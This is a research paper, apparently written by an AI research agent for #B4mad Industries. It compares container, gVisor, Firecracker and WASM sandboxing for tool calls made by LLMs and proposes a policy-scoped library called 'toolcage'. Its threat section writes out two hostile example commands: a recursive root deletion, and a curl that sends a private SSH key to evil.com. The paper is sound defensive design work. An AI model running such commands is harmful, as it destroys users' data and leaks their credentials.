
**Author:** Roman "Romanov" Research-Rachmaninov, #B4mad Industries
**Date:** 2026-02-19
**Bead:** beads-hub-42d

## Abstract

Tool use is emerging as the critical capability gap between proprietary and open-source language models. Sebastian Raschka (Lex Fridman #490) identifies it as "the huge unlock" but flags trust as the barrier: unconstrained tool execution on a user's machine risks data destruction, exfiltration, and privilege escalation. This paper evaluates four sandboxing technologies — OCI containers, gVisor, Firecracker microVMs, and WebAssembly (WASM) — for isolating LLM-initiated tool calls. We propose a **security-scoped tool execution layer** that #B4mad can extract from OpenClaw as a standalone library, enabling any local open model to safely invoke tools.

## Context: Why This Matters for #B4mad

OpenClaw already implements sandboxed execution: sub-agents run shell commands, edit files, and control browsers within a managed environment with policy-based access control. This capability is baked into the platform but not extractable. Meanwhile, the open-model ecosystem (Qwen, Llama, Mistral) is rapidly gaining function-calling abilities but lacks a standardized, secure execution runtime. There is a clear product opportunity: a lightweight, embeddable sandbox library that any inference framework (llama.cpp, vLLM, Ollama) can use to safely execute tool calls.

## The Trust Problem

When an LLM generates a tool call like `exec("rm -rf /")` or `curl https://evil.com/exfil --data @~/.ssh/id_rsa`, the runtime must enforce:

1. **Filesystem isolation** — restrict reads/writes to a scoped directory
2. **Network policy** — block or allowlist outbound connections
3. **Syscall filtering** — prevent privilege escalation, raw device access
4. **Resource limits** — CPU, memory, time caps to prevent DoS
5. **Capability scoping** — per-tool permission grants (this tool may read files but not write; that tool may make HTTP requests but only to api.example.com)

## Technology Evaluation

### 1. OCI Containers (Docker, Podman)

**How it works:** Tool calls execute inside a container with a minimal filesystem, dropped capabilities, seccomp profiles, and network namespaces.

| Aspect | Assessment |
|--------|------------|
| Startup latency | 200–500ms (cold), <100ms (warm with pool) |
| Isolation strength | Good — namespace + cgroup + seccomp. Not a security boundary by default, but hardened configs (rootless, no-new-privileges, read-only rootfs) are strong |
| Ecosystem maturity | Excellent — universal tooling, broad adoption |
| Filesystem scoping | Bind-mount specific directories read-only or read-write |
| Network control | `--network=none` or custom network policies |
| Overhead | Low — shared kernel, minimal memory overhead |

**Verdict:** Best default choice. Lowest friction, most mature, sufficient isolation for the threat model (untrusted LLM output, not adversarial kernel exploits).

### 2. gVisor (runsc)

**How it works:** A user-space kernel that intercepts syscalls, providing an additional isolation layer on top of OCI containers. Used by Google Cloud Run.

| Aspect | Assessment |
|--------|------------|
| Startup latency | 300–800ms |
| Isolation strength | Excellent — syscall interception means container escapes require defeating both gVisor and the host kernel |
| Ecosystem maturity | Good — drop-in OCI runtime replacement |
| Compatibility | ~90% of Linux syscalls; some edge cases (io_uring, certain ioctls) fail |
| Performance | 5–30% overhead on I/O-heavy workloads due to syscall interposition |

**Verdict:** Strong choice when higher isolation is needed (e.g., executing code generated by untrusted models). The OCI compatibility means it's a runtime swap, not an architecture change.

### 3. Firecracker microVMs

**How it works:** Lightweight VMs with a minimal VMM (Virtual Machine Monitor), booting a stripped Linux kernel in ~125ms. Used by AWS Lambda and Fly.io.

| Aspect | Assessment |
|--------|------------|
| Startup latency | 125–200ms (impressive for a full VM) |
| Isolation strength | Maximum — hardware virtualization boundary (KVM). Separate kernel instance |
| Resource overhead | ~5MB memory for the VMM; guest kernel adds ~20–40MB |
| Ecosystem maturity | Moderate — requires KVM, custom rootfs images, API-driven lifecycle |
| Complexity | High — snapshot/restore helps latency but adds operational complexity |

**Verdict:** Overkill for most tool calls but appropriate for high-risk operations (arbitrary code execution, untrusted plugins). The snapshot/restore pattern could pre-warm VMs for sub-100ms cold starts.

### 4. WebAssembly (WASM) Sandboxes

**How it works:** Tool implementations compiled to WASM run in a sandboxed runtime (Wasmtime, WasmEdge) with capability-based security (WASI).

| Aspect | Assessment |
|--------|------------|
| Startup latency | <1ms (near-instant) |
| Isolation strength | Very good — linear memory model, no raw syscalls, capability-based I/O |
| Ecosystem maturity | Growing but incomplete — WASI preview 2 still stabilizing; not all tools can be compiled to WASM |
| Language support | Rust, C/C++, Go (via TinyGo), Python (via componentize-py, limited) |
| Limitation | Cannot run arbitrary shell commands; tools must be purpose-built as WASM components |

**Verdict:** Ideal for a curated tool catalog (file operations, HTTP clients, parsers) but cannot sandbox arbitrary shell execution. Complementary to container-based approaches.

## Proposed Architecture: `toolcage`

We propose a library called **`toolcage`** (working name) with the following design:

```
┌─────────────────────────────────────┐
│         Inference Runtime           │
│  (Ollama / vLLM / llama.cpp)        │
│                                     │
│  Model generates: tool_call(...)    │
│         │                           │
│         ▼                           │
│  ┌─────────────┐                    │
│  │  toolcage   │  ← policy engine   │
│  │  library    │  ← sandbox manager │
│  └──────┬──────┘                    │
│         │                           │
└─────────┼───────────────────────────┘
          │
          ▼
┌─────────────────────┐
│   Sandbox Backend    │
│  ┌───┐ ┌───┐ ┌───┐  │
│  │OCI│ │gVi│ │WAS│  │
│  │   │ │sor│ │M  │  │
│  └───┘ └───┘ └───┘  │
└─────────────────────┘
```

### Core Concepts

1. **Tool Registry** — each tool declares its capabilities: filesystem paths, network endpoints, max execution time, required syscalls
2. **Policy Engine** — a TOML/YAML policy file maps tools to allowed capabilities, similar to OpenClaw's existing tool policies
3. **Sandbox Backend** — pluggable: OCI (default), gVisor (hardened), Firecracker (maximum), WASM (for built-in tools)
4. **Result Extraction** — structured output capture (stdout/stderr/exit code/files) with size limits

### Example Policy

```toml
[tool.web_fetch]
backend = "oci"
network = ["allowlist:api.example.com:443"]
filesystem = "none"
timeout = "30s"
memory = "128MB"

[tool.code_execute]
backend = "gvisor"
network = "none"
filesystem = { writable = ["/workspace"], readable = ["/data"] }
timeout = "60s"
memory = "512MB"

[tool.file_edit]
backend = "wasm"
filesystem = { writable = ["/workspace/project"] }
network = "none"
timeout = "10s"
```

### Integration Points

- **Ollama:** Post-generation hook that intercepts tool calls before execution
- **vLLM:** Custom tool executor callback in the serving layer
- **llama.cpp:** Function call handler in the server mode
- **OpenClaw:** Replace the current exec subsystem with toolcage for consistency

## Competitive Landscape

| Project | Approach | Gap |
|---------|----------|-----|
| OpenAI Code Interpreter | Proprietary sandbox | Not available locally |
| E2B.dev | Cloud-hosted sandboxes | Requires network round-trip; not local-first |
| Modal | Serverless containers | Cloud-only; not embeddable |
| Daytona | Dev environment sandboxes | Full workspace, not per-tool-call scoped |
| **toolcage** (proposed) | **Local, per-call, policy-scoped** | **Does not exist yet** |

The key differentiator: **toolcage** would be the first local-first, embeddable, per-tool-call sandbox with declarative security policies.

## Recommendations

1. **Start with OCI + rootless Podman** as the default backend. It's available everywhere, well-understood, and sufficient for the primary threat model.

2. **Implement the policy engine first** — this is the real value. The sandbox backend is pluggable; the security model is the product.

3. **Ship as a Go or Rust library with a CLI wrapper** — embeddable in inference runtimes but also usable standalone (`toolcage exec --policy tools.toml -- python script.py`).

4. **Contribute to the MCP (Model Context Protocol) ecosystem** — Anthropic's MCP is becoming the standard for tool definitions. A toolcage MCP server that wraps any tool in a sandbox would have immediate adoption.

5. **Extract from OpenClaw incrementally** — OpenClaw's exec subsystem already solves this problem. Factor out the sandbox and policy layers as a library, then have OpenClaw depend on it.

6. **Publish as open source** — this positions #B4mad as a thought leader in secure local AI infrastructure, driving adoption toward the broader OpenClaw platform.

## Risk Assessment

| Risk | Likelihood | Mitigation |
|------|-----------|------------|
| Container escape via kernel exploit | Low | gVisor/Firecracker backends for high-risk tools |
| Policy misconfiguration allows exfiltration | Medium | Deny-by-default; require explicit allowlists; lint policies |
| Performance overhead kills UX | Medium | Container pooling; WASM for lightweight tools; warm caches |
| Ecosystem moves to cloud-only sandboxes | Low | Local-first is a strong counter-position for privacy-conscious users |

## References

1. Raschka, S. (2026). Interview on Lex Fridman Podcast #490, "AI State of the Art 2026." ~32:54 timestamp discussing tool use and containerization.
2. Google gVisor Project. https://gvisor.dev/
3. AWS Firecracker. https://firecracker-microvm.github.io/
4. WebAssembly System Interface (WASI). https://wasi.dev/
5. Anthropic Model Context Protocol (MCP). https://modelcontextprotocol.io/
6. E2B.dev — Open-source cloud sandboxes for AI. https://e2b.dev/
7. Open Containers Initiative (OCI) Runtime Specification. https://opencontainers.org/

---

*This paper was produced by Romanov (Research-Rachmaninov) for #B4mad Industries. Filed under bead beads-hub-42d.*

